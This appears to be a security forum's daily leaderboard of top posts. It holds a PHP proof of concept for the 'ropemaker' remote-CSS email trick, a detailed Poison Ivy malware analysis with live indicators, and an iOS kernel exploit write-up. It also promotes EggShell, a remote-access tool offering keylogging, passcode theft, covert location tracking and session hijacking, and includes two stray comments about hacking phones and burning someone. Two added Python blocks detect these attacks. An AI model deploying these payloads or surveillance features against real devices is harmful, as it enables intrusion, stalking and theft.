Leaderboard
Popular Content
Showing content with the highest reputation on 08/25/17 in all areas
-
https://www.it-sec-catalog.info/
Available from https://it-sec-catalog.info/ and https://www.gitbook.com/book/arthurgerkis/it-sec-catalog.
About this project
This is a catalog of links to articles on computer security: software and hardware analysis and vulnerability exploitation, shellcode development and security mitigations, including computer security research, and malware stuff. Slides are not included (there is another project for that). Advisories without many details are also not included. All articles are only in English. The project has been running since 2010.
Author and contributors
Author of this project: Arthur (ax330d) Gerkis; contributors: Nitay Artenstein, Joe (j0echip) Chip. Thanks to everyone who helped with the project.
6 points
-
Put more information on the site: what types of ads you sell (popup, banners (+ sizes)), why we should use your site (e.g. we pay very fast, payment methods), a privacy policy on the first page in the footer (see internal links), and say on the first page that the revshare is 90%. + the text you have now looks copied. My opinion: you are a network that sells ads but doesn't know how to sell itself.
2 points
-
DeLux Edition: Getting root privileges on the eLux Thin Client OS
eLux is designed as a secure, streamlined environment for users to access applications such as a browser, Citrix and terminal services. The vendor describes it as: "... a hardware-independent operating system for cloud computing environments. It is based on a write protected file system and therefore secure against computer viruses and other malware without using special Antivirus Software. eLux® has been continuously developed and enhanced for more than 15 years."
Source: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/delux-edition-getting-root-privileges-on-the-elux-thin-client-os/
2 points
-
I played with ropemaker in the last few hours and I can say it's nothing special. POC:

<?php
$to = "destinatar@site.tld";
$subject = "ropemaker vulnerability";
// HTML body: the visible word after "a" is filled in later by the remote stylesheet's :after rule
$message = <<<START
<html>
<head>
<style type="text/css">@import "http://link_catre_extern/style.css"</style>
</head>
<body>
I heard you are a <span id="content"></span> boy
</body>
</html>
START;
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-Type: text/html; charset=UTF-8\r\n";
$headers .= "Content-Transfer-Encoding: quoted-printable\r\n";
// Encode the body so it matches the declared transfer encoding
mail($to, $subject, quoted_printable_encode($message), $headers);

In the CSS file we have this:

#content:after { content:"good"; }

After sending the email, the CSS file can be modified to add something else (e.g. bad). From my point of view, the vulnerability is only a problem at the level of the developers who created the applications and don't know to block importing CSS files from external sources. There are very few applications that don't block the stylesheets (the vulnerability only worked for me on Outlook on Android), so in a month or two we should have security updates for them and ropemaker should be a thing of the past.
2 points
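The PoC above works only because the mail client fetches a stylesheet the sender still controls after delivery; the defensive side is therefore a check for remote CSS. The Python below is an added example, not code from the post: find_remote_css() lists every remote styling reference (the @import form from the PoC, plus the <link rel=stylesheet> and url() forms) and strip_remote_css() removes them before rendering. The sample message is constructed from the PoC body with the extra <link> and url() references added as assumptions; the attacker.example host is a placeholder.

```python
import re

# Constructed sample: the PoC body from the post above, plus a <link> stylesheet and a
# CSS url() reference (the last two are assumptions added to cover the other common forms).
SAMPLE_MAIL = """<html>
<head>
<link rel="stylesheet" href="https://attacker.example/late.css">
<style type="text/css">@import "http://link_catre_extern/style.css";
body { background: url(https://attacker.example/track.png) }</style>
</head>
<body>
I heard you are a <span id="content"></span> boy
</body>
</html>"""

# The three ways an HTML mail can pull styling from a server the sender still controls
REMOTE_IMPORT = re.compile(r'@import\s+(?:url\()?\s*["\']?\s*(https?://[^"\')\s;]+)', re.I)
REMOTE_URL = re.compile(r'url\(\s*["\']?\s*(https?://[^"\')\s]+)', re.I)
REMOTE_LINK = re.compile(r'<link\b[^>]*\bhref\s*=\s*["\']?(https?://[^"\'>\s]+)', re.I)


def find_remote_css(html):
    """Return every remote URL a mail client would fetch to style this message.

    Any hit means the rendered text can change after delivery: the sender only has
    to edit the stylesheet (for instance the #content:after rule from the post).
    """
    found = []
    for rx in (REMOTE_IMPORT, REMOTE_URL, REMOTE_LINK):
        found.extend(rx.findall(html))
    return found


def strip_remote_css(html):
    """Neutralise remote styling so the message renders the same way forever.

    <link> elements are dropped, @import rules are removed, and external url()
    values are replaced by 'none'. Inline CSS that ships with the mail is kept.
    """
    html = re.sub(r'<link\b[^>]*>', '', html, flags=re.I)
    html = re.sub(r'@import\s+(?:url\([^)]*\)|"[^"]*"|\'[^\']*\')[^;}<]*;?', '', html, flags=re.I)
    html = re.sub(r'url\(\s*["\']?https?://[^)]*\)', 'none', html, flags=re.I)
    return html


if __name__ == "__main__":
    for url in find_remote_css(SAMPLE_MAIL):
        print("remote stylesheet reference:", url)
    print(strip_remote_css(SAMPLE_MAIL))
```

Blocking is the right policy rather than fetching once and caching: a stylesheet that looks harmless at delivery time can still be swapped later, which is exactly the ROPEMAKER trick.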
-
My little sister's phone got stolen/lost a week ago. Yesterday, I got a strange text. Today, I peaked!
My little sister, who is going to be a senior, worked hard all summer to buy an iPhone, only to have it stolen (or fall out, she is still not entirely sure) out of her boyfriend's car a week ago. She had not activated the Find My iPhone app, so we reported it stolen but were pretty sure someone was just being gifted a free iPhone courtesy of my sister's summer wages. On top of that, she had also bought a wallet case and lost all her IDs and cards as well. So yesterday I get this text from a strange number. I give my sister a quick call to make sure it is not her and effectively realize someone is fishing through her contacts or documents to get her password. I am well aware after the WTH that this is not my sister, BTW. I was bored, so I say to myself, why not have some fun. We will never get the phone back, but what the heck, might as well kill some time. I am certain that his or her insistence will at the very least make this a lengthy exchange. I'm convinced this person is humoring me and just stringing me along until I cave. No one can be buying this! .... Again, I am thinking he is humoring me, but I was like, let's see how long this lasts until he stops texting me back. AVERY FTW!!!! My sister got an email this morning. I have peaked! Behold!
Source: https://imgur.com/r/funny/USjnb
I don't know if it's real, but the idea is interesting.
1 point
-
Web Development
Web languages: PHP, Javascript
Design: Bootstrap
Template engine: Smarty
Editing/Fixing/Optimization: Wordpress
Scraper framework: Simple HTML Dom
Information
- I accept long-term as well as short-term projects.
- For any project all the details will be established at the start with the client; new features cannot be added during the project (only small changes).
- Support is completely FREE. By support I mean: installation, bug fixing, MySQL fixing, etc.
- Prices will be set according to the time the project needs and its complexity.
- I also accept jobs where I receive a monthly salary.
- I also accept jobs where I am paid by the hour.
Portfolio:
- I offer live previews of projects in private or via TeamViewer (I'm not allowed to share the companies' links, but I can show pictures).
Payment
- BitCoin/Ethereum
- PayPal
- Bank transfer
- Paysafe
Contact
- ICQ: CURRENTLY UNAVAILABLE
- Telegram: @adicode
- Skype: adicode32@outlook.com
- Jabber: adicode@404.city
**Please don't leave messages like "I added you", "how much would it cost?", "can you do this?" in the topic. I await any question via PM or on one of the networks above. Thank you.
1 point
-
In general they reply within a month at most. Leave your phone number here and someone will hack it for you.
1 point
-
It works on Gmail too, but not with the CSS parameters.
1 point
-
Scum. I hope he writhes in agony. @aelius - those people don't seem interested, burn the scumbag.
1 point
-
Deep Analysis of New Poison Ivy Variant
by Xiaopeng Zhang | Aug 23, 2017 | Filed in: Security Research

Recently, the FortiGuard Labs research team observed that a new variant of Poison Ivy was being spread through a compromised PowerPoint file. We captured a PowerPoint file named Payment_Advice.ppsx, which is in OOXML format. Once the victim opens this file using the MS PowerPoint program, the malicious code contained in the file is executed. It downloads the Poison Ivy malware onto the victim's computer and then launches it. In this blog, I'll show the details of how this happens, what techniques are used by this malware, as well as what it does to the victim's computer.

The PowerPoint Sample

Figure 1 shows a screenshot of when the ppsx file is opened.

Figure 1. Open Payment_Advice.ppsx

As you can see, the ppsx file is played automatically. The "ppsx" extension stands for "PowerPoint Show," which opens the file in presentation mode. This allows the malicious code to be executed automatically. The warning message box alerts the user that it might run an unsafe external program. Usually, the implied content of the document beguiles the user into pressing the Enable button.

Let's take a look at the malicious code embedded inside this PowerPoint file. An OOXML file is a zip format file. By decompressing this file we can see the file/folder structure, shown below.

Figure 2. PPSX file structure

Going into its .\ppt\slides\ subfolder, slide1.xml is the slide automatically shown in Figure 1. The file ".\_rels\slide1.xml.rels" is the relationship file where the resources used in slide1.xml are defined. In slide1.xml, I found the xml code: . This means that when the user's mouse hovers over this element, something named "rId2" in the slide1.xml.rels file is executed. Figure 3 shows the relationship between them.

Figure 3. The code defined in "rId2"

Being Added into the Startup Group

The code defined in "rId2" uses an echo command of cmd.exe to output VBS code into the Thumbs.vbs file in the "Startup" folder of the Start menu. This allows the Thumbs.vbs file to be executed when the victim's system starts. We'll take a look at the content of this Thumbs.vbs file below.

Figure 4. Thumbs.vbs in the Startup folder and its content

The Downloaded File

Thumbs.vbs downloads a file from hxxp://203.248.116.182/images/Thumbs.bmp and runs it using msiexec.exe. As you may know, msiexec.exe is the Microsoft Windows Installer program, which is the default handler of .MSI files. Msiexec.exe can be used to install/uninstall/update software on Windows. The MSI file is an Installer Package. It contains a PE file (in a stream) that is executed when it's loaded by msiexec.exe. This PE file can be replaced with malware to bypass AV detection. We have also observed that more and more malware authors have started using this method to run their malware. The MSI file is in the Microsoft OLE Compound File format. In Figure 5 we can see the downloaded Thumbs.bmp file content in the DocFile Viewer.

Figure 5. The downloaded Thumbs.bmp in DocFile viewer

Next, I'm going to extract this PE file from the stream into a file (exported_thumbs). By checking with a PE analysis tool, we can see that it's a 64-bit .Net program. This means that this malware only affects 64-bit Windows.

Analyzing the .Net code and Running It

After putting this extracted file into dnSpy to be analyzed, we can see the entry function Main(), as shown in Figure 6.

Figure 6. Main function

It then calls the rGHDcvkN.Exec() function in Main(), which contains a huge array. Actually, the data in the array is the code that is executed as a thread function by a newly-created thread. Figure 7 clearly shows how the code in the array is executed.

Figure 7. .Net program runs a thread to execute the code in a huge array

If the code is run on a 64-bit platform, IntPtr.Size is 8, so the huge array is passed to array3. It then allocates a memory buffer by calling rGHDcvkN.VirtualAlloc() and copies the code from array3 into the new memory by calling Marshal.Copy(). It eventually calls rGHDcvkN.CreateThread() to run the code.

I started the .Net program in the debugger, and set a breakpoint on the CreateThread API to see what the array code would do when it's hit. Per my analysis of the array code, it is a kind of loader. Its main purpose is to dynamically load the main part of the malware code from the memory space into a newly-allocated memory buffer. It then repairs any relocation issues according to the new base address and repairs the APIs' offsets for the main part code. Finally, the main code's entry function is called.

Anti-Analysis Techniques

All APIs are hidden. They are restored when being called. The snippet below is the hidden CreateRemoteThread call.

sub_1B0E6122 proc near
mov rax, 0FFFFFFFF88E23B10h
neg rax
jmp rax ;; CreateRemoteThread
sub_1B0E6122 endp

All strings are encrypted. They are decrypted before use. For example, this is the encrypted "ntdll" string.

unk_1AFD538C db 54h, 0B2h, 9Bh, 0F1h, 47h, 0Ch ; ==> "ntdll"

It runs a thread (I named it ThreadFun6) to check if an API has been set as a breakpoint. If yes, it calls TerminateProcess in another thread to exit the process immediately. The thread function checks all APIs in the following modules: "ntdll", "kernel32", "kernelbase" and "user32". In Figure 8, you can see how this works:

Figure 8. Checking for breakpoints on exported APIs in "ntdll"

It runs a thread to check if any analysis tools are running. It does this by creating specially named pipes that are created by some analysis tools. For example, "\\.\Regmon" for the registry monitor tool RegMon; "\\.\FileMon" for the local file monitor tool FileMon; "\\.\NTICE" for SoftIce, and so on. If one of the named pipes cannot be created, it means one of the analysis tools is running. It then exits the process soon thereafter.

It then goes through all the running program windows to check if any window class name contains a special string, to determine if an analysis tool is running. For example, "WinDbgFrameClass" is the class name of Windbg's main window. This check runs in a thread as well (I named it Threadfun3). Below, Figure 9 shows how this thread function works.

Figure 9. Check Windows' Class Name

By checking to see if the "Wireshark-is-running-{...}" named mutex object exists (by calling OpenMutex), it implements an anti-WireShark check.

By calling the API "IsDebuggerPresent", it can check to see if this process is running in a debugger (returns 1). It's a kind of anti-debugging check. It also checks how much time is spent by calling IsDebuggerPresent. If the time is more than 1000ms, it means that the process runs in a debugger or VM, and it then exits the process.

These are all the ways that this malware performs anti-analysis. Most of these checks run in their own threads, and are called every second. It then exits the process if any check is matched. To continue the analysis of this malware, we have to first skip these checks. We can dynamically modify its code to do so. For example, changing "IsDebuggerPresent"'s return value to 0 allows us to bypass the running-in-debugger detection.

Generating A Magic String from a Decrypted String

By decrypting three strings and putting them together, we get the magic string "Poison Ivy C++", which will be saved in a global variable qword_1B0E4A10. From the code snippet below you can see how it makes this string.

Figure 10. Generating the magic string

Hiding Key-functions in Six Different Modules

It next loads several modules from its encrypted data. It creates a doubly-linked list, which is used to save and manage these loaded modules. There are many export functions from each of these modules that achieve the malware's main work. In this way, it's also a challenge for dynamic debugging. The variable qword_1AFE45D0 saves the header of that doubly-linked list. Each object in the list has the structure below:

+00H pointer to previous object in the list
+08H pointer to next object in the list
+18H for Critical Section object use
+28H the base address of the module this object is related to
+30H pointer to export function table

It then decrypts and decompresses six modules one by one, and adds each of them into the doubly-linked list. Figure 11 shows a code snippet from decrypting these six modules.

Figure 11. Decrypting and decompressing modules

Each module has an Initialization function (like the DllMain function for Dll files) that is called once the module is completely decrypted and decompressed. Three of these modules have an anti-analysis ability similar to the one I described in the Anti-Analysis section above. So to continue the analysis of this malware, I needed to modify their code to bypass their detection functions. After that it calls the export functions of those modules.

It decrypts the configuration data from the buffer at unk_1AFE3DA0. This configuration data is decrypted many times while the process is running, and it tells the malware how to work. I'll talk more about the configuration data in a later section.

The malware then picks a string from the configuration data, which is "%windir%\system32\svchost.exe". It later calls CreateProcess to run svchost.exe, and then injects some code and data from the malware's memory into the newly-created svchost.exe. It finally calls the injected code and exits its current process. The malware's further work is now done on the svchost.exe side.

Starting over in SVCHOST.exe

Through my analysis I could see that the injected code and data represent the entire malware. It all starts over again in the svchost.exe process. Everything I have reviewed above is repeated in svchost.exe. For example, executing the anti-analysis detection code, getting the magic string, creating a doubly-linked list, decrypting six modules and adding them into the doubly-linked list, and so on.

It then goes to a different code branch when executing the instruction 01736C2 cmp dword ptr [rdi+0Ch], 1 in module2. [rdi+0Ch] is a flag that was passed when the entire code was initialized. When the flag is 0, it takes the code branch to run svchost.exe and inject code into it; when it's 1, it takes the code branch to connect to the C&C server. Before the injected code in svchost.exe is executed, the flag is set to 1. Figure 12 shows the code branches.

Figure 12. Snippet of code branches

Obtaining the C&C Server from PasteBin

The C&C server's IP addresses and ports are encrypted and saved on the PasteBin website. PasteBin is a text code sharing website. A registered user can paste text code on it in order to share the text content with everyone. The malware author created 4 such pages, and put the C&C server IP addresses and ports there. Do you remember when I talked previously about the encrypted configuration data? It contains the 4 PasteBin URLs. They are:

hxxps://pastebin.com/Xhpmhhuy
hxxps://pastebin.com/m3TPwxQs
hxxps://pastebin.com/D8A2azM8
hxxps://pastebin.com/KQAxvdvJ

Figure 13 shows the decrypted configuration data.

Figure 13. Decrypted configuration data

If you access any one of these URLs, you will find there is normal Python code on it. The encrypted server IP address and port are hidden in the normal Python code. Let's take a look. While looking at the main function you will find the code below:

win32serviceutil.HandleCommandLine({65YbRI+gEtvlZpo0qw6CrNdWDoev})

The data between "{" and "}" is the encrypted IP address and port. See Figure 14 for more information.

Figure 14. Encrypted C&C IP address and Port on PasteBin

Let's see what we can see after decryption in Figure 15.

Figure 15. Decrypted IP address and Port

From Figure 15, we can determine that the decrypted C&C server IP address is 172.104.100.53 and the Port is 1BBH, i.e. 443. It should be noted that the IP addresses and Ports on the four pages are not the same. The author of this malware can update these IP addresses and Ports by simply updating the Python code on the four PasteBin pages.

Communicating with the C&C server

The malware starts connecting and sending data to its C&C server once it gets the IP address and Port. All the packets traveling between the malware and its server are encrypted using a private algorithm. The structure of the packet is like this (the first 14H bytes are the header part; from 14H on is the data part):

+00 4 bytes: a key for encryption or decryption.
+04 4 bytes: the packet command.
+0C 4 bytes: the length in bytes of the data portion of the packet.
+14 4 bytes. From this point on is the real data.

Once the malware has connected to the server, it first sends a "30001" command, and the server replies with command "30003". The command "30003" requests the client to collect the victim's system information. Once the malware receives this command, it calls tons of APIs to collect the system information. It gathers the system's current usage of both physical and virtual memory by calling GlobalMemoryStatusEx. It gets the CPU speed from the system registry at "HKLM\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0\~MHz". It gets the free disk space of all partitions by calling GetDiskFreeSpaceExA. It gets the CPU architecture by calling GetNativeSystemInfo. It collects display settings by calling EnumDisplaySettings. It collects file information from kernel32.dll. It gets the current computer name and user name by calling GetComputerName and GetUserName. It also gets the system time by calling GetSystemTime, and the system version by calling GetVersionEx. Finally, it copies svchost.exe's full path and a constant string, "PasteBin83", which is from the decrypted configuration data (see Figure 13 again).

In Figure 16 you can see the collected system information before encryption. Figure 17 shows the data after encryption as it's about to be sent to the C&C server. The first four bytes are used to encrypt or decrypt the following data.

Figure 16. Collected information from the victim's system

Figure 17. Encrypted system information from victim's system

From my analysis during the malware runtime, I could determine that the malware keeps obtaining the C&C server's IP address from PasteBin and communicating with the C&C server in an infinite loop (calling Sleep(1000) to suspend execution between iterations). So far, I have only seen the commands "030001" and "030003" used. I'll continue to monitor and analyze the malware's behavior to see what else it will do.

Solution

The FortiGuard Antivirus service has detected the file "Payment_Advice.ppsx" as MSOFFICE/PoisonIvy.A!tr.dldr and "Thumbs.bmp" as MSOFFICE/PoisonIvy.A!tr.

IOC

URL: hxxp://203.248.116.182/images/Thumbs.bmp

Sample SHA-256 hashes:
Payment_Advice.ppsx E7931270A89035125E6E6655C04FEE00798C4C2D15846947E41DF6BBA36C75AE
Thumbs.bmp A3E8ECF21D2A8046D385160CA7E291390E3C962A7107B06D338C357002D2C2D9

Source: https://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant
1 point
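As an added example (not Fortinet's code), here is a Python triage script for the infection vector described at the start of the analysis: it walks a PPSX, reads each slide's .rels part, and reports external relationships wired to a hyperlink action on the slide, i.e. the "rId2" pattern that fires on mouse-over. The deck it scans is constructed in memory from two minimal parts; the hlinkMouseOver element carrying a ppaction://program action and the placeholder cmd.exe target are assumptions modelled on the behaviour the post describes, not the sample's real content.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"
P_NS = "http://schemas.openxmlformats.org/presentationml/2006/main"

# Action URI PowerPoint uses to run the relationship target as a program.
PROGRAM_ACTION = "ppaction://program"

# Constructed minimal deck: one slide with a mouse-over action, and its relationship part.
# The Target command line is a harmless placeholder, not the dropper's real echo/cmd line.
SAMPLE_SLIDE = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<p:sld xmlns:p="{P_NS}" xmlns:a="{A_NS}" xmlns:r="{R_NS}">
  <p:cSld><p:spTree>
    <p:sp><p:txBody><a:p><a:r>
      <a:rPr lang="en-US"><a:hlinkMouseOver r:id="rId2" action="{PROGRAM_ACTION}"/></a:rPr>
      <a:t>Loading...</a:t>
    </a:r></a:p></p:txBody></p:sp>
  </p:spTree></p:cSld>
</p:sld>"""

SAMPLE_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{PKG_NS}">
  <Relationship Id="rId1" Type="{R_NS}/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{R_NS}/hyperlink" Target="cmd.exe /c echo placeholder" TargetMode="External"/>
  <Relationship Id="rId3" Type="{R_NS}/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>"""


def build_sample_ppsx():
    """Zip the two constructed parts into an in-memory PPSX (all other parts omitted)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("ppt/slides/slide1.xml", SAMPLE_SLIDE)
        z.writestr("ppt/slides/_rels/slide1.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def scan_ppsx(data):
    """Report external relationships that a slide can fire as a program.

    For every slideN.xml.rels, external targets are cross-referenced with the element
    in slideN.xml that carries the matching r:id, so the report says what triggers the
    target (hlinkClick, hlinkMouseOver, ...) and with which action attribute.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        for rels_name in sorted(names):
            m = re.fullmatch(r"ppt/slides/_rels/(slide\d+\.xml)\.rels", rels_name)
            if not m:
                continue
            slide_name = "ppt/slides/" + m.group(1)
            triggers = {}  # rId -> (element local name, action attribute)
            if slide_name in names:
                for el in ET.fromstring(z.read(slide_name)).iter():
                    rid = el.get(f"{{{R_NS}}}id")
                    if rid:
                        triggers[rid] = (el.tag.rsplit("}", 1)[-1], el.get("action"))
            for rel in ET.fromstring(z.read(rels_name)).findall(f"{{{PKG_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                rid, target = rel.get("Id"), rel.get("Target", "")
                trigger, action = triggers.get(rid, (None, None))
                # A program action, or a target that is not a web/mail link, is worth a look.
                if action == PROGRAM_ACTION or not re.match(r"(?i)(https?|mailto|ftp):", target):
                    findings.append({"slide": slide_name, "rid": rid, "target": target,
                                     "trigger": trigger, "action": action})
    return findings


if __name__ == "__main__":
    for f in scan_ppsx(build_sample_ppsx()):
        print(f"{f['slide']} {f['rid']} via {f['trigger']} ({f['action']}): {f['target']}")
```

Run against a real deck, the same function takes the bytes of the .ppsx file; ordinary web hyperlinks (rId3 in the sample) are skipped so that only targets PowerPoint would hand to a program launcher are listed.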
-
ziVA: Zimperium's iOS Video Audio Kernel Exploit
Adam Donenfeld, Aug 23 2017

Following my previous post, I'm releasing ziVA: a fully chained iOS kernel exploit that (should) work on all the iOS devices running iOS 10.3.1 or earlier. The exploit itself consists of multiple vulnerabilities that were discovered all in the same module: AppleAVEDriver. The exploit will be covered in depth in my HITBGSEC talk held on August 25th.

For those of you who are not interested in iOS research and would like to protect themselves against these vulnerabilities, we urge you to update your iOS device to the latest version. Without an advanced mobile security and mitigation solution on the device (such as Zimperium zIPS), there's little chance a user would notice any malicious or abnormal activity.

The POC is released for educational purposes and evaluation by IT Administrators and Pentesters alike, and should not be used in any unintended way. The CVE explanations, as written by Apple, can be found here.

iOS vulnerabilities discovered and reported to Apple

AVEVideoEncoder
Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation
Impact: An application may be able to gain kernel privileges
Description: Multiple memory corruption issues were addressed with improved memory handling.
CVE-2017-6989: Adam Donenfeld (@doadam) of the Zimperium zLabs Team
CVE-2017-6994: Adam Donenfeld (@doadam) of the Zimperium zLabs Team
CVE-2017-6995: Adam Donenfeld (@doadam) of the Zimperium zLabs Team
CVE-2017-6996: Adam Donenfeld (@doadam) of the Zimperium zLabs Team
CVE-2017-6997: Adam Donenfeld (@doadam) of the Zimperium zLabs Team
CVE-2017-6998: Adam Donenfeld (@doadam) of the Zimperium zLabs Team
CVE-2017-6999: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

IOSurface
Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation
Impact: An application may be able to gain kernel privileges
Description: A race condition was addressed through improved locking.
CVE-2017-6979: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

I will provide an in-depth analysis of the vulnerabilities and exploitation techniques at HITBGSEC. After the conference, I will publish the rest of the disclosures as well as my slides and whitepaper.

A brief description of one of the vulnerabilities, CVE-2017-6979:

The function IOSurfaceRoot::createSurface is responsible for the creation of the IOSurface object. It receives an OSDictionary, which it forwards to the function IOSurface::init. IOSurface::init parses the properties and, in case one of these is invalid (e.g. a width that exceeds 32 bits), returns 0, and the creation of the IOSurface is halted. The IOSurfaceRoot object must hold a lock while calling IOSurface::init because IOSurface::init adds the IOSurface object to the IOSurfaceRoot's list of surfaces. Here's the code that used to call IOSurface::init before Apple's fix:

surface = (IOSurface *)OSMetaClass::allocClassWithName("IOSurface");
IORecursiveLockLock(provider->iosurface_array_lock);
if ( !surface ) {
    IORecursiveLockUnlock(provider->iosurface_array_lock);
    return 0;
}
init_ret_code = surface->init(surface, provider, task_owner, surface_data);
/* At this point, the surfaces' list is unlocked, and an invalid IOSurface object is in the list */
IORecursiveLockUnlock(provider->iosurface_array_lock);
if ( !init_ret_code ) {
    /* release happens outside the lock: another thread can already hold a reference */
    surface->release(surface);
    return 0;
}

In case the IOSurface::init function fails, IORecursiveLockUnlock will be called. A bogus IOSurface object will still be in the system and in the IOSurfaceRoot's list of surfaces (thus accessible to everyone). At this particular moment, an attacker can increase the refcount of the IOSurface (creating, for instance, an IOSurfaceSendRight object attached to the surface) and prevent the bogus IOSurface object from being destroyed. This leads to the existence of an IOSurface in the kernel whose properties the attacker controls (IOSurface->width = -1 for example). Such an IOSurface object can be given to other mechanisms in the kernel which might rely on a valid width/height/one of the properties to work, thus causing heap overflows or other problems that might lead to an elevation of privileges by the attacker.

Our proposed solution to Apple was to call IOSurface::release while the lock provider->iosurface_array_lock is still held. Therefore moving the IORecursiveLockUnlock call just below IOSurface::release, and putting it after the entire if statement, would fix the problem, because the IOSurfaceRoot's list of surfaces will only be available once the bogus IOSurface is already cleaned up. Further reverse engineering of the function reveals that Apple changed the code according to our suggestions:

surface = (IOSurface *)OSMetaClass::allocClassWithName("IOSurface");
IORecursiveLockLock(provider->iosurface_array_lock);
if ( !surface ) {
    IORecursiveLockUnlock(provider->iosurface_array_lock);
    return 0;
}
init_ret_code = surface->init(surface, provider, task_owner, surface_data);
if ( !init_ret_code ) {
    surface->release(surface);
    /* Here our bad surface is freed *before* the kernel unlocks the surfaces' list,
       hence our bad surface is not accessible at any time in case IOSurface::init fails. */
    IORecursiveLockUnlock(provider->iosurface_array_lock);
    return 0;
}
IORecursiveLockUnlock(provider->iosurface_array_lock);

The issues are severe and could lead to a full device compromise. The vulnerabilities ultimately allow an attacker with initial code execution to fully control any iOS device on the market prior to version 10.3.2. Fortunately, we responsibly disclosed these bugs to Apple and a proper fix was coordinated. iOS users that update their device to the latest iOS version should be protected.

We discovered more vulnerabilities, and the written exploit POC didn't take advantage of CVE-2017-6979! The vulnerabilities used for the POC will be covered in depth. We plan to release the security advisories as we sent them to Apple right after my talk at HITBGSEC.

Zimperium's patented machine-learning technology, z9, detects the exploitation of this vulnerability. We recommend strengthening iOS security using a solution like Zimperium zIPS. Powered by z9, zIPS offers protection against known and unknown threats targeting Apple iOS and Google Android devices. z9 has detected every discovered exploit over the last five years without requiring updates.

The exploit source code is available here.

Disclosure timeline:
24/01/2017 – First bug discovered
20/03/2017 – Shared bugs with Apple
29/03/2017 – Apple confirmed the bugs
15/05/2017 – Apple distributed patches

I would like to thank Apple for their quick and professional response, and Zuk Avraham (@ihackbanme) and Yaniv Karta (@shokoluv), who helped in the process.

Source: https://blog.zimperium.com/ziva-video-audio-ios-kernel-exploit/
1 point
-
Brief Overview EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploits “Meterpreter”, I decided to create a better, native, secure, and easier tool with most, if not more commands for macOS And Jailbroken iOS Devices. This tool creates a bash payload what spawns a command line session with the target including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES Encrypted Communication All data sent between the server and target are encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started. Getting Started To use EggShell, you must have pycrypto and Python 2.7.x installed Install using git: (macOS/Linux) git clone https://github.com/neoneggplant/EggShell cd EggShell python eggshell.py Create And Run A Payload Using the menu, we can choose to create a bash payload, this is what will be run on the target machine. It is a 2 stage payload, it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary. Example: running the created payload on our target Back on our server, we can see we received a connection and an eggshell session has been started! 
macOS Commands
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
picture : take picture through iSight camera
getpid : get process id
openurl : open url through the default browser
idletime : get the amount of time since the keyboard/cursor were touched
getpaste : get pasteboard contents
mic : record microphone
brightness : adjust screen brightness
exec : execute command
persistence : attempts to connect back every 60 seconds
rmpersistence : removes persistence

iOS Commands
sysinfo : get system information
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
frontcam : take picture through front camera
backcam : take picture through back camera
mic : record microphone
getpid : get process id
vibrate : make device vibrate
alert : make alert show up on device
say : make device speak
locate : get device location
respring : respring device
setvol : set mediaplayer volume
getvol : view mediaplayer volume
isplaying : view mediaplayer info
openurl : open url on device
dial : dial number on device
battery : get battery level
listapps : list bundle identifiers
open : open app
persistence : installs LaunchDaemon – tries to connect every 30 seconds
rmpersistence : uninstalls LaunchDaemon
installpro : installs eggshellpro to device

EggShellPro Commands (Cydia Substrate Extension)
lock : simulate lock button press
wake : wake device from sleeping state
home : simulate home button press
doublehome : simulate home button double press
play : plays music
pause : pause music
next : next track
prev : previous track
getpasscode : log successful passcode attempts
unlock : unlock with passcode
keylog : log keystrokes
keylogclear : clear keylog data
locationservice : turn on or off location services

EggShell Pro
EggShell Pro is a Cydia Substrate library that takes advantage of the system functions in iOS. With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has been unlocked with. When interacting with an iOS device, simply run "installpro" and the dylib file will be uploaded to the device, followed by a respring.

Navigating/Downloading Files
EggShell has a command-line-interface-like feel to it. Using the Unix-like commands built into EggShell, we can print the working directory (pwd), list a directory (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like on the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a PDF file on the target machine.

Taking Pictures
Taking a photo with the "picture" command on macOS will activate the iSight camera and send the image data back to the server. To take a picture on iOS, use "frontcam" or "backcam".

iOS Location Tracking Even With Location Services Off
EggShellPro lets us send commands to toggle location services on or off. This means that even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off again. We get the location coordinates of the exact spot the device is currently in and also a convenient link to Google Maps.

iOS Getting Passcode
EggShellPro hooks into lock-screen functions and logs any successful entry of the device's passcode in memory. When we run "getpasscode" we are sent back the passcode that was last used to unlock the device.

macOS Hijacking Safari Facebook Sessions
